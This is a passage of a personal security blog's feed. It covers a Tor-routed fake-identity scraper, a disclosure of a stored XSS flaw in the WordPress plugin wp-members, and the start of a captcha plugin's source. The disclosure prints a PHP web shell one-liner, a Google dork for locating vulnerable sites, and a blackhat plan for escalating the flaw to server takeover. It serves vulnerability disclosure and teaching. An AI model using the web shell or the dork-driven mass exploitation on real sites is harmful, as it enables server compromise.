<span class="s1">'Being or not being!'</span><span class="p">,</span>
<span class="s1">'Python is worse then PHP ;)'</span><span class="p">,</span>
<span class="s1">'a -> b <=> if a then b'</span>
<span class="p">]</span>
<span class="n">choice</span> <span class="o">=</span> <span class="n">BoxSelector</span><span class="p">(</span><span class="n">L</span><span class="p">)</span><span class="o">.</span><span class="n">pick</span><span class="p">()</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Your choice was "</span><span class="si">{0}</span><span class="s1">"'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">L</span><span class="p">[</span><span class="n">choice</span><span class="p">]))</span>
</code></pre></div>
<p>As you can see, it is very easy to make such a browsable text selection
command line interface. Just pass you list of strings to a BoxSelector()
class and call the method pick(), which creates all the terminal
interface stuff and terminates if a user chose a textbox with hitting
enter...</p>
<p>Here is a little picture illustrating the above example:<br>
[<img alt="text_selector.py illustration" src="https://incolumitas.com/uploads/2013/06/Bildschirmfoto-vom-2013-06-02-190913-1024x576.png"></p>Create anonymous identites with fakenamegenerator.com and Python2013-05-30T14:14:00+02:002013-05-30T14:14:00+02:00Nikolai Tschachertag:incolumitas.com,2013-05-30:/2013/05/30/create-anonymous-identites-with-fakenamegenerator-com-and-python/<h3>Introduction</h3>
<p>Woah, it has been a hell of a long time since I posted my last
contribution (I feel like I always begin my blog post with these
introductory words). However, today I want to show you how to forge
random identites with a site called
<a href="http://fakenamegenerator.com">fakenamegenerator.com</a>. I use Python 3
and a unoffical branch of
<a href="http://socksipy.sourceforge.net/" title="socksipy">socksipy</a>, a nice module
which enables you to tunnel TCP/IP streams through a remote server,
commonly used to disguise your real IP address. There are three availabe
modes, SOCKS4, SOCKS5 and HTTP. In this blog post, I use SOCKS5, since I
install TOR and route my requests through a local proxy sitting on
127.0.0.1:9050.</p>
<h3>Why and what</h3>
<p>The team behind fakenamegenerator.com writes on their site:</p>
<blockquote>
<p><em><strong>Name:</strong> Names are generated by randomly pulling a first and a last
name out of a database. The database was compiled from public domain
sources. [...]</em></p>
<p><em><strong>Street address:</strong> The house number is a randomly generated number.
The street name is pulled from a database of plausible street names
for the state/country being generated. Odds are that the generated
street address is not valid.</em></p>
<p><em><strong>City, state, and postal code:</strong> We have compiled a …</em></p></blockquote><h3>Introduction</h3>
<p>Woah, it has been a hell of a long time since I posted my last
contribution (I feel like I always begin my blog post with these
introductory words). However, today I want to show you how to forge
random identites with a site called
<a href="http://fakenamegenerator.com">fakenamegenerator.com</a>. I use Python 3
and a unoffical branch of
<a href="http://socksipy.sourceforge.net/" title="socksipy">socksipy</a>, a nice module
which enables you to tunnel TCP/IP streams through a remote server,
commonly used to disguise your real IP address. There are three availabe
modes, SOCKS4, SOCKS5 and HTTP. In this blog post, I use SOCKS5, since I
install TOR and route my requests through a local proxy sitting on
127.0.0.1:9050.</p>
<h3>Why and what</h3>
<p>The team behind fakenamegenerator.com writes on their site:</p>
<blockquote>
<p><em><strong>Name:</strong> Names are generated by randomly pulling a first and a last
name out of a database. The database was compiled from public domain
sources. [...]</em></p>
<p><em><strong>Street address:</strong> The house number is a randomly generated number.
The street name is pulled from a database of plausible street names
for the state/country being generated. Odds are that the generated
street address is not valid.</em></p>
<p><em><strong>City, state, and postal code:</strong> We have compiled a database
containing hundreds of thousands of valid city, state, and postal code
combinations. One of these combinations is randomly pulled from the
database for each identity.</em></p>
<p><em><strong>Telephone number:</strong> We have compiled a database of valid area codes
and prefixes. One of these combinations is randomly pulled from the
database, and then a random number of the appropriate length is added
to the end to make the phone number the correct length.</em></p>
<p><em><strong>Mother's maiden name:</strong> A random name is pulled from our database
of last names, and listed as the "mother's maiden name".</em></p>
<p><em><strong>Birthday:</strong> The birthday is a randomly generated date. [...]</em></p>
</blockquote>
<p>Furthermore, and here we come to the reason of this blog post:</p>
<blockquote>
<p>We <strong>do not</strong> condone, support, or encourage illegal activity of any
kind. We <strong>will</strong> cooperate with law enforcement organizations to
assist in the prosecution of anyone that misuses the information we
provide or that asks us to provide illegal materials, such as forged
documents or genuine credit card numbers.</p>
</blockquote>
<p>I am convinced that they map every identity requested by a client to the
corresponding IP address. Therefore, the generated identity is not
anonymous, because your ip address can be mapped to your real identity
over your internet service provider.</p>
<h3>Solution</h3>
<p>That's what I came up with to enforce the retrieval of anonymous
identites. This is actually the <code>test_function()</code> which calls the function
<code>scrape_identity()</code> which in turn extracts all the pieces constituting
the identity from fakenamegenerator.com. You can implement your own
application logic with <code>scrape_identity()</code>. It just returns a list of
tuples, whereas each tuple contains the element name (such as 'name',
'birthdate', 'gender' ...) and the corresponding value.</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">anon_identity</span><span class="p">():</span>
<span class="sd">"""This function is a example how to use scrape_identity() anonymously</span>
<span class="sd"> through TOR. Used like that, you don't have to worry that your generated</span>
<span class="sd"> identity is matched to your IP address and therefore to your real identity.</span>
<span class="sd"> """</span>
<span class="c1"># Set up a socks socket. You might want to fire up your local TOR PROXY, before</span>
<span class="c1"># using this function.</span>
<span class="c1"># Just download TOR here https://www.torproject.org/ and then start tor.</span>
<span class="n">socks</span><span class="o">.</span><span class="n">setdefaultproxy</span><span class="p">(</span><span class="n">socks</span><span class="o">.</span><span class="n">PROXY_TYPE_SOCKS5</span><span class="p">,</span><span class="s1">'127.0.0.1'</span><span class="p">,</span> <span class="mi">9050</span><span class="p">)</span>
<span class="n">socks</span><span class="o">.</span><span class="n">wrapmodule</span><span class="p">(</span><span class="n">urllib</span><span class="o">.</span><span class="n">request</span><span class="p">)</span>
<span class="nb">id</span> <span class="o">=</span> <span class="n">scrape_identity</span><span class="p">()</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Generated a random and anonymous identity:'</span><span class="p">)</span>
<span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="nb">id</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'</span><span class="se">\t</span><span class="si">{0:.<20}{1}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">e</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">e</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
</code></pre></div>
<p>You can use my work like this:</p>
<div class="highlight"><pre><span></span><code>$ git clone https://github.com/NikolaiT/anonymous_identity
$ <span class="nb">cd</span> anonymous_identity
$ python3
Python <span class="m">3</span>.2.3 <span class="o">(</span>default, Oct <span class="m">19</span> <span class="m">2012</span>, <span class="m">19</span>:53:16<span class="o">)</span>
<span class="o">[</span>GCC <span class="m">4</span>.7.2<span class="o">]</span> on linux2
Type <span class="s2">"help"</span>, <span class="s2">"copyright"</span>, <span class="s2">"credits"</span> or <span class="s2">"license"</span> <span class="k">for</span> more information.
>>> from identity_generator import anon_identity
>>> anon_identity<span class="o">()</span>
<span class="o">[</span>+<span class="o">]</span> Generated a random and anonymous identity:
full_name...........Kyle M. Cuevas
address.............1136 Ethels Lane
phone_number........863-703-6140
mother_maiden_name..Powell
birthdate...........August <span class="m">2</span>, <span class="m">1994</span>
blood_group.........A+
weight..............70.0 kilograms
height..............186 centimeters
>>>
</code></pre></div>No 1. - wp-members: Interesting peristant XSS leading to remote code execution.2013-03-15T23:12:00+01:002013-03-15T23:12:00+01:00Nikolai Tschachertag:incolumitas.com,2013-03-15:/2013/03/15/no-1-wp-members-interesting-peristant-xss-leading-to-remote-code-execution/<p>Hey you there!</p>
<p><strong>Type:</strong> Stored cross site scripting<br>
<strong>Risk:</strong> Medium to high<br>
<strong>Affecting:</strong> <a href="http://wordpress.org/extend/plugins/wp-members/">http://wordpress.org/extend/plugins/wp-members/</a>
<strong>Vendor site:</strong> <a href="http://rocketgeek.com">http://rocketgeek.com</a></p>
<h3>Preface</h3>
<p>It has been quite some time since I took concern of my blog, although I
would have had some content ready (maybe even worth) to be published.
Around six weeks ago, I rummaged (wow - new word!) through endless lines
of wordpress plugin code, in the hope to get my hands on some low
hanging fruits (In the likely case you don't have a clue what I am
talking about: I was searching for easyily detectable security bugs in
plugin applications written for wordpress). After analysing for several
hours the architecture and design of a randomly chosen target -
<a href="http://wordpress.org/extend/plugins/wp-members/">wp-members</a>, a plugin
providing the site owner with the functionality to password protect
content on his wordpress site - I was able to detect a pretty nasty bug.</p>
<h3>The bug</h3>
<p>Alongside with the access restriction mechanism, the plugin furthermore
allows users to register. The potential user is presented a nice form,
which would transfer an array of registration data to the web server
when submitted. Considering this, there is only one possibile location
for a sink source and therefore …</p><p>Hey you there!</p>
<p><strong>Type:</strong> Stored cross site scripting<br>
<strong>Risk:</strong> Medium to high<br>
<strong>Affecting:</strong> <a href="http://wordpress.org/extend/plugins/wp-members/">http://wordpress.org/extend/plugins/wp-members/</a>
<strong>Vendor site:</strong> <a href="http://rocketgeek.com">http://rocketgeek.com</a></p>
<h3>Preface</h3>
<p>It has been quite some time since I took concern of my blog, although I
would have had some content ready (maybe even worth) to be published.
Around six weeks ago, I rummaged (wow - new word!) through endless lines
of wordpress plugin code, in the hope to get my hands on some low
hanging fruits (In the likely case you don't have a clue what I am
talking about: I was searching for easyily detectable security bugs in
plugin applications written for wordpress). After analysing for several
hours the architecture and design of a randomly chosen target -
<a href="http://wordpress.org/extend/plugins/wp-members/">wp-members</a>, a plugin
providing the site owner with the functionality to password protect
content on his wordpress site - I was able to detect a pretty nasty bug.</p>
<h3>The bug</h3>
<p>Alongside with the access restriction mechanism, the plugin furthermore
allows users to register. The potential user is presented a nice form,
which would transfer an array of registration data to the web server
when submitted. Considering this, there is only one possibile location
for a sink source and therefore origin of tainted data. The PHP file
handling the registration logic is not unsurprisingly called
wp-members-register.php. The vulnerable wp-members version can be found
<a href="http://downloads.wordpress.org/plugin/wp-members.2.8.0.zip">here</a> (zip
file of the youngest vulnerable version).</p>
<p>The herein aforementioned wp-members-register.php-file contains a
unsound function named <code>wpmem_registration( $toggle )</code> which was
affected from two kinds of XSS flaws: Reflected and persistent (or
stored) XSS vulnerability. Whereas the reflected isn't really dangerous
(modern browsers easily spot them and filter them out by recognizing
script tags and html entities in the URL), the peristent on the other
hand might become rather unpleasant.</p>
<p>This first code snippet shows the preparation of the input and some
parsing. We learn that the input is written into a two dimensional array
named <code>$fields</code>.</p>
<div class="highlight"><pre><span></span><code><span class="x">// build array of the posts</span>
<span class="x">$wpmem_fields = get_option( 'wpmembers_fields' );</span>
<span class="x">for( $row = 0; $row < count( $wpmem_fields ); $row++ ) {</span>
<span class="x"> $wpmem_fieldval_arr[$row] = $_POST[$wpmem_fields[$row][2]];</span>
<span class="x"> // add for _data hooks</span>
<span class="x"> if( $wpmem_fields[$row][2] != 'password' && $wpmem_fields[$row][4] == 'y' ) {</span>
<span class="x"> $fields[$wpmem_fields[$row][2]] = $wpmem_fieldval_arr[$row];</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>The program logic continues with some checks for obligatory data:</p>
<div class="highlight"><pre><span></span><code><span class="x">// check for required fields </span>
<span class="x">$wpmem_fields_rev = array_reverse( $wpmem_fields );</span>
<span class="x">$wpmem_fieldval_arr_rev = array_reverse( $wpmem_fieldval_arr );</span>
<span class="x">for( $row = 0; $row < count($wpmem_fields); $row++ ) {</span>
<span class="x"> $pass_chk = ( $toggle == 'update' && $wpmem_fields_rev[$row][2] == 'password' ) ? true : false;</span>
<span class="x"> if( $wpmem_fields_rev[$row][5] == 'y' && $pass_chk == false ) {</span>
<span class="x"> if( !$wpmem_fieldval_arr_rev[$row] ) { $wpmem_themsg = sprintf( __('Sorry, %s is a required field.', 'wp-members'), $wpmem_fields_rev[$row][1] ); }</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>Then, the we find ourselves in a big switch statement which states the
whole remainder of the function. It basically consists of two cases:
register and update. Since we are only interested in the register
functionality, we ingore the update branch.</p>
<p>Now the coder implements some counter action against injection attacks.
He checks the supplied username if the corresponding user exists, has
valid characters and so on. When some of these checks fail, the script
denies further execution. It makes essentially the same with the
supplied email address.</p>
<div class="highlight"><pre><span></span><code><span class="x">if( !$username ) { $wpmem_themsg = __( 'Sorry, username is a required field', 'wp-members' ); return $wpmem_themsg; exit(); } </span>
<span class="x">if( !validate_username( $username ) ) { $wpmem_themsg = __( 'The username cannot include non-alphanumeric characters.', 'wp-members' ); return $wpmem_themsg; exit(); }</span>
<span class="x">if( !is_email( $user_email) ) { $wpmem_themsg = __( 'You must enter a valid email address.', 'wp-members' ); return $wpmem_themsg; exit(); }</span>
<span class="x">if( $wpmem_themsg ) { return "empty"; exit(); }</span>
<span class="x">if( username_exists( $username ) ) { return "user"; exit(); } </span>
<span class="x">if( email_exists( $user_email ) ) { return "email"; exit(); }</span>
</code></pre></div>
<p>At this point, our <code>$fields</code> array is partly sanitized, the rest is still
populated with arbitrary raw data we are able to control.</p>
<div class="highlight"><pre><span></span><code><span class="k">Array</span><span class="w"></span>
<span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">username</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"> </span><span class="n">SANITIZED</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">user_email</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="nv">@uuuuuuuu</span><span class="p">.</span><span class="n">com</span><span class="w"> </span><span class="n">SANITIZED</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">first_name</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">last_name</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">addr1</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">addr2</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">city</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">thestate</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">zip</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">country</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">phone1</span><span class="o">]</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="n">uuuuuuuu</span><span class="w"></span>
<span class="p">)</span><span class="w"></span>
</code></pre></div>
<p>We finally come to the first part of the vulnerability. The raw post
data is inserted into the database through the wordpress API function
<code>update_user_meta()</code>.</p>
<div class="highlight"><pre><span></span><code><span class="x">// set remaining fields to wp_usermeta table</span>
<span class="x">for( $row = 0; $row < count( $wpmem_fields ); $row++ ) {</span>
<span class="x"> if( $wpmem_fields[$row][2] != 'password' ) {</span>
<span class="x"> if( $wpmem_fields[$row][2] == 'user_url' ) { // if the field is user_url, it goes in the wp_users table</span>
<span class="x"> wp_update_user( array ( 'ID' => $user_id, 'user_url' $wpmem_fieldval_arr[$row] ) );</span>
<span class="x"> } else {</span>
<span class="x"> if( $wpmem_fields[$row][2] != 'user_email' ) { // email is already done above, so if it's not email...</span>
<span class="x"> if( $wpmem_fields[$row][4] == 'y' ) { // are we using this field?</span>
<span class="x"> update_user_meta( $user_id, $wpmem_fields[$row][2], $wpmem_fieldval_arr[$row] );</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>Unfortunately, these family of wordpress API functions
(<code>update_user_meta()</code>) don't strip html meta characters (no
<code>htmlspecialchars()</code> functionality!). Maybe the author assumed that they
would.</p>
<p>However, now we know that we can insert arbitrary data (thus also html
and javascript code) into the database. This is nothing special or even
insecure yet, because the application could still sanitize the data when
retrieving it from the database and processing it further. Unfortunately
this doesn't happen.</p>
<p>Well. The next idea of mine was too look at the admin panel. I mean,
this panel may show the tainted user data in a table or something
similar. And that's what it does:</p>
<p>An wordpress administrator can access the wordpress plugin wp-members
over the general admin panel => Plugins => Users => WP-members. Then
he sees a table overview of all registered users. The corresponding URL
to obtain this view is
http://localhost/wp/wp-admin/users.php?page=wpmem-users (<em>localhost/wp</em>
is my document root in this case...)</p>
<p>Well, the table consits of 5 columns:</p>
<div class="highlight"><pre><span></span><code>Username
Name
E-mail
Phone
Country
</code></pre></div>
<p>Remember that our investigations revealed that we are able to insert
html/javascript into the database for the Name, Phone and Country field?
Let's check, where this admin panel is made and wheter the data is
sanitized:</p>
<p>The view is generated through the function <code>wpmem_admin_users()</code> in the
/wp-content/plugins/wp-members/user.php file. The actual<br>
value submitted at registration time is then echoed to the page at line
261:<br>
Excerpt:</p>
<div class="highlight"><pre><span></span><code><span class="x">echo " ID}&" . esc_attr( stripslashes( $_SERVER['REQUEST_URI'] ) ) . "\">" . $user->user_login . "\n";</span>
<span class="x">echo " \n";</span>
<span class="x">echo " " . get_user_meta( $user->ID, 'first_name', 'true' ) . " " . get_user_meta( $user->ID, 'last_name', 'true' ) . "\n";</span>
<span class="x">echo " " . $user->user_email . "\n";</span>
<span class="x"> if( $col_phone == true ) {</span>
<span class="x">echo " " . get_user_meta( $user->ID, 'phone1', 'true' ) . "\n";</span>
<span class="x"> }</span>
<span class="x"> if( $col_country == true ) {</span>
<span class="x">echo " " . get_user_meta( $user->ID, 'country', 'true' ) . "\n";</span>
<span class="x"> }</span>
</code></pre></div>
<p>The value isn't propperly escaped, neither at the time when inserted
into the database, nor when selected with <code>get_user_meta()</code>. Maybe the
coder thought that <code>get_user_meta()</code> is XSS safe?!</p>
<p>The code is only triggered when a user with a field containing the
exploit code is shown in the admin table. This is normally not the case,
because there are a vast amount of of users and they are distributed
over many sites in the panel. Why is that no reduce the threat level of
the attack vector?<br>
Users are listed in alphabetical order in the admin panel, according to
the usernames alphabetical position submitted at registration. So we can
force with a username like 'aaaaaaaaaaaaaaa' (of course not so
suspicous) that we are shown (echoed) easily at the first page! This
means our exploit code is always triggered when the admin access the
plugin panel, therefore the exploitation chances are pretty good!</p>
<h3>How would a blackhat design the exploit?</h3>
<p>The original data shouldn't look suspicous, no suspicion at all should
be provocated (sneaky stealth mode enabled). The javascript code
shouldn't take long to execute or alter the front end surface. The code
must be maximally redundant and should be obfuscated and of course well
tested!<br>
Wikipedia says:</p>
<blockquote>
<p>The persistent (or stored) XSS vulnerability is a more devastating
variant of a cross-site scripting flaw: it occurs when the data provided
by the attacker is saved by the server, and then permanently displayed
on "normal" pages returned to other users in the course of regular
browsing, without proper HTML escaping. </p>
</blockquote>
<p>When the payload is triggered, we automatically have the admin cookie.
So we could steal the cookie and send it to the attackers server to log
in from there and upload a shell. This is ways too strenuous and
verbose, so we directly manipulate a existing plugin via the built-in
plugin-editor of wordpress. The nonce is no further problem, since we
just know it (XSS eliminates XSRF prevention!) At the exectution time
the exploit could send a little notification message to our server and
then that blackhat, knows that his shell is ready for him to access.</p>
<p>### How can we find vulnerable sites including the plugin?</p>
<p>Google dork of wp-members:</p>
<blockquote>
<p>This content is restricted to site members.</p>
</blockquote>
<p>I recenty published a python script to scan pages with google:
<a href="http://incolumitas.com/2013/01/06/googlesearch-a-rapid-python-class-to-get-search-results">http://incolumitas.com/2013/01/06/googlesearch-a-rapid-python-class-to-get-search-results</a><br>
We could scan pages with the above dork and find lots of sites with the
installed vulnerable plugin.</p>
<h3>The consequences</h3>
<p>On every server where wp-members is installed and when the registration
is open (which is the normal case, since a sane website never refuses
users\^\^), a malicious user can register with valid data (to pass
several registration checks) and the additional exploit code in the
<em>phone</em> or <em>country</em> field in the registration form.<br>
Whenever a admin looks at the overview in his admin panel from
wp-members, the injected code is executed. Because the javascript code
runs in the context of the admin, the code is absolutely TRUSTED (stored
XSS):The code can do whatever action the wordpress admin panel provides.
For example: Change the PHP code of another plugin over the standard
edit function provided in the wordpress admin panel
(/wp/wp-admin/plugin-editor.php) to something like</p>
<div class="highlight"><pre><span></span><code><span class="x">/* Bet you get the idea */</span>
<span class="cp"><?php</span>
<span class="k">echo</span> <span class="nb">system</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">]);</span>
<span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>and gain a remote shell on the server. This means the server is fully
compromised (at least http/sql). No need to crack salted md5 hashes,
like in boring sql injections. Direct RCE.</p>
<p>The plugin currently has (271,196) downloads (242,142 when I found the
bug 6 weeks ago), 600 downloads on a daily base. I estimate the number
of servers who actually installed the plugin at around 30.000 (is this
actually very modest guessing). Due to the nature of the flaw:<br>
I guess that a determined blackhat could find 80% of all vulnerable
servers through spiders. Furthmore, modestly guessing, on 30% of these
servers the<br>
exploit would be triggered. This makes: <code>0.8*0.3*30.000 = 7200</code>. After
adjusting downwards, realisticly 5000 servers could be compromised
(shell access) within a short period of time (few days to a week).
These<br>
servers could act as a neat DOS-Botnet; servers have lot's of
networking power, don't they?</p>
<h3>Prevention</h3>
<p>Sanitizing untrusted data. It's always the same story. Wheter it's a
command execution, buffer overflows, sqli injections, XSS, there is one
simple approach to chocke off the root of the problem: Allow only data
into the application, which compares positvly with a whitelist. This
sounds easy, indeed it is, but under the financial pressure of greedy
organizations and general coding stress, security is often ignored and
missed.</p>
<p>On the technical side, htmlspecialchars() over the \$fields[] array in
wp-members-register.php.<br>
htmlspecialchars() over every data the user is able to manipulate and
craft!</p>
<h3>Last words</h3>
<p>This was only the most gaping flaw, the other became (yeah, they exist)
rather uninteresting, since I had already a way to get on the server.
Chad Butler, the author, fixed the bugs very quickly and professionaly.
He took all my suggestions/concerns very serious and it was generally a
nice experience working with him!</p>Another wordpress catpcha implementation2013-01-25T22:01:00+01:002013-01-25T22:01:00+01:00Nikolai Tschachertag:incolumitas.com,2013-01-25:/2013/01/25/how-to-make-your-own-little-captcha-in-php/<h3>Hey dear readership and dudelmatz :)</h3>
<p>I'm kinda overworked and planned quite a while ago to release my own
little captcha implementation to prevent this massive bulk of spam
comments I receive on a daily base: It's obnoxious to scroll through
this sheer amount of spam comments and delete them. You can't just
masstrash them, because you might miss a legit comment and therefore you
need to check every single one. I assume the spammer embrace this
expected behaviour of a blogger, and therefore exploit it.</p>
<p>So I needed to put a stop to this violation of my spare time and I
created my own captcha. Of course, I first searched for a working and
already existing solution (and I am sure there are many which are better
then what I came up with), but the one I used is basically
<a href="http://wordpress.org/extend/plugins/captcha/">crap</a>. <a href="http://wordpress.org/extend/plugins/captcha/"><br>
</a></p>
<p>Its plugin description states:</p>
<blockquote>
<p><em>Captcha plugin allows you to protect your website from spam using
math logic which can be used for login, registration, reseting
password, comments forms.</em></p>
</blockquote>
<p>And yeah as I feared this simple elegant captcha is worthless, because
math logic is a joke to parse and solve by computers (=>spamscripts). I
was pissed and in a mood …</p><h3>Hey dear readership and dudelmatz :)</h3>
<p>I'm kinda overworked and planned quite a while ago to release my own
little captcha implementation to prevent this massive bulk of spam
comments I receive on a daily base: It's obnoxious to scroll through
this sheer amount of spam comments and delete them. You can't just
masstrash them, because you might miss a legit comment and therefore you
need to check every single one. I assume the spammer embrace this
expected behaviour of a blogger, and therefore exploit it.</p>
<p>So I needed to put a stop to this violation of my spare time and I
created my own captcha. Of course, I first searched for a working and
already existing solution (and I am sure there are many which are better
then what I came up with), but the one I used is basically
<a href="http://wordpress.org/extend/plugins/captcha/">crap</a>. <a href="http://wordpress.org/extend/plugins/captcha/"><br>
</a></p>
<p>Its plugin description states:</p>
<blockquote>
<p><em>Captcha plugin allows you to protect your website from spam using
math logic which can be used for login, registration, reseting
password, comments forms.</em></p>
</blockquote>
<p>And yeah as I feared this simple elegant captcha is worthless, because
math logic is a joke to parse and solve by computers (=>spamscripts). I
was pissed and in a mood to write my first wordpress plugin, so I did my
own from scratch.</p>
<p>Well, I need to warn you: My solution is designed to work only on this
site, because it wouldn't be all too hard to crack it and to bypass its
deception. But this won't happen, because there's no reason: This site
has by far not the critical traffic (not yet) which would make it
interesting for a spammer to circumwent the captcha.</p>
<p>Well enough said, you can see the plugin in action on this site (see the
comments section). Here's the source:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="cm">/*</span>
<span class="cm">Plugin Name: CunningCaptcha</span>
<span class="cm">Plugin URI: http://incolumitas.com</span>
<span class="cm">Description: Simple/easy captcha to prevent spam at commenting.</span>
<span class="cm">Version: 0.1</span>
<span class="cm">Author: Nikolai</span>
<span class="cm">Author URI: http://incolumitas.com</span>
<span class="cm">License: GPLv2 or later</span>
<span class="cm">*/</span>
<span class="cm">/* Copyright 2013 Nikolai (email : admin@incolumitas.com)</span>
<span class="cm"> This program is free software; you can redistribute it and/or modify</span>
<span class="cm"> it under the terms of the GNU General Public License, version 2, as </span>
<span class="cm"> published by the Free Software Foundation.</span>
<span class="cm"> This program is distributed in the hope that it will be useful,</span>
<span class="cm"> but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<span class="cm"> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<span class="cm"> GNU General Public License for more details.</span>
<span class="cm"> You should have received a copy of the GNU General Public License</span>
<span class="cm"> along with this program; if not, write to the Free Software</span>
<span class="cm"> Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA</span>
<span class="cm">*/</span>
<span class="cm">/*</span>
<span class="cm"> * A really simplistic approach to eliminate my spam problem on my</span>
<span class="cm"> * website. Generates a captcha consisting of 4 figures and inserts</span>
<span class="cm"> * some noise to prevent it from being cracked by skids.</span>
<span class="cm"> * I think the effort of cracking it wouldn't take longer than 3 hours</span>
<span class="cm"> * for an intermediate programmer. Its efectiveness lies in the captchas</span>
<span class="cm"> * uniqueness. Generally, security by obfuscation is a bad idea. At least I </span>
<span class="cm"> * know that :) When somebody tries to crack it, I will harden it. As long</span>
<span class="cm"> * as you give up...</span>
<span class="cm"> */</span>
<span class="c1">// http://wpengineer.com/2214/adding-input-fields-to-the-comment-form/</span>
<span class="c1">// http://wpengineer.com/2205/comment-form-hooks-visualized/</span>
<span class="nb">define</span><span class="p">(</span><span class="s2">"CCAPTCHA_DEBUG"</span><span class="p">,</span> <span class="k">false</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">CCAPTCHA_DEBUG</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">error_reporting</span><span class="p">(</span><span class="k">E_ALL</span><span class="p">);</span>
<span class="nb">ini_set</span><span class="p">(</span><span class="s1">'display_errors'</span><span class="p">,</span> <span class="k">true</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">define</span><span class="p">(</span><span class="s2">"FIGURE_SIZE"</span><span class="p">,</span> <span class="mi">30</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s2">"NUM_BRUSH_CHANGES_MAX"</span><span class="p">,</span> <span class="mi">3</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s2">"PPM_FILE"</span><span class="p">,</span> <span class="nx">plugin_dir_path</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">)</span><span class="o">.</span><span class="s2">"gen.ppm"</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s2">"CAPTCHA_PNG"</span><span class="p">,</span> <span class="nx">plugin_dir_path</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">)</span><span class="o">.</span><span class="s2">"captcha.png"</span><span class="p">);</span>
<span class="cm">/* Apply intercepting logic with wordpress API */</span>
<span class="c1">// Set a filter to add additional input fields for the comment</span>
<span class="nx">add_filter</span><span class="p">(</span><span class="s1">'comment_form_defaults'</span><span class="p">,</span> <span class="s1">'ccaptcha_comment_form_defaults'</span><span class="p">);</span>
<span class="c1">// Add a filter to verify if the captch was correct</span>
<span class="nx">add_filter</span><span class="p">(</span><span class="s1">'preprocess_comment'</span><span class="p">,</span> <span class="s1">'ccaptcha_check'</span><span class="p">);</span>
<span class="c1">// Add a action hook to add the additioal field to the db</span>
<span class="nx">add_action</span><span class="p">(</span><span class="s1">'comment_post'</span><span class="p">,</span> <span class="s1">'ccaptcha_save_input'</span><span class="p">);</span>
<span class="k">function</span> <span class="nf">ccaptcha_save_input</span><span class="p">(</span><span class="nv">$comment_id</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">add_comment_meta</span><span class="p">(</span><span class="nv">$comment_id</span><span class="p">,</span>
<span class="s1">'ccaptcha'</span><span class="p">,</span> <span class="nb">strip_tags</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'ccaptcha'</span><span class="p">]));</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">ccaptcha_check</span><span class="p">(</span><span class="nv">$commentdata</span><span class="p">)</span> <span class="p">{</span>
<span class="k">global</span> <span class="nv">$current_user</span><span class="p">;</span>
<span class="nx">get_currentuserinfo</span><span class="p">();</span>
<span class="nv">$uid</span> <span class="o">=</span> <span class="nv">$current_user</span><span class="o">-></span><span class="na">ID</span><span class="p">;</span>
